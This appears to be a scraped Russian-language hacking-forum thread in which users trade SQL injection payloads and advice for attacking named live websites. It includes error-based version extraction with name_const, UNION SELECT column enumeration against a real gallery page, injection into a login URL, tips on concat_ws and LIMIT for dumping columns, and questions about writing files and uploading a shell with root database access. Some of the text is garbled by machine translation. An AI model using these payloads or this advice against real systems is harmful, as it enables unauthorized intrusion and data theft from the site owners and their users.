SELECT * FROM menu_items WHERE link = '1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and''. Duplicate column name '5.5.8'
вопрос таков: если я имею рутовский доступ к БД, что я теоретически смогу сделать? Вплане заливки шелла, правки индекса... Например, через тулзу MySQL query browser
А как вывести только одну колонку ? Пытаюсь вот таким запросом http://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(information_schema.tables))and' Но в ответ пишет:
полный доступ к базе MySQL, создание/уничтожение и читать/писать файлы (если есть достаточно прав у пользователя MySQL в системе)
если разрешён коннект с удалённых ip для пользователя, то ты сможешь с неё подконнектится, иначе нет Подзапрос может возвращать только одно значение, тобишь нельзя использовать *, там же написано. Если надо вернуть несколько колонок сразу, то надо сначала их объединить оператором типа concat_ws(0x3a,column_1,column_2,...,column_n), где 0x3a = : в hex формате. А ещё предвижу ошибку subquery returned more than one row(ну или как-то так), это потому что надо использовать лимит в подзапросе.
Melfis ессесно я к ней и подключаюсь и все что хочешь могу делать. перефразирую: какие мне команды отправлять БД чтобы загрузить файл и вообще возможно ли это?
why i can not see vul columns no?? Code: http://www.myhomestory.com/interior-doors-gallery.php?id=-1%20UnioN%20selEct%20all%200,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
becouse id=1+and+1=0 http://www.myhomestory.com/interior-doors-gallery.php?id=1+and+1=0%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1-- this is forum Russian,translate write... уже наконец то
чего нашел?, просто создал не верную логику или же так http://www.myhomestory.com/interior-doors-gallery.php?id=111111111111111111111%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1--
Хорошо. . я получил его. . спасибо! Это параметр для SQL инъекций, это может быть POST SQL инъекции, я не совсем уверен. Код: Чтобы получить сообщение об ошибке я HackBar для Firefox, я ставлю в этой первой: Код: http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html Тогда я нажал на "Включить сообщения данных и поместить в параметр и я нажал на" Выполнить "и он дал мне следующее сообщение об ошибке (ы): Код: Warning: Неверный аргумент для Еогеасп поставки () в / home/yaziyaz2/public_html / Evrim / компоненты / com_content / модели / category.php на линии 337 Предупреждение: mysql_num_rows (): поставляется аргумент не является допустимым результатом MySQL ресурса / home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql. PHP в строке 344 как вводить дальше??
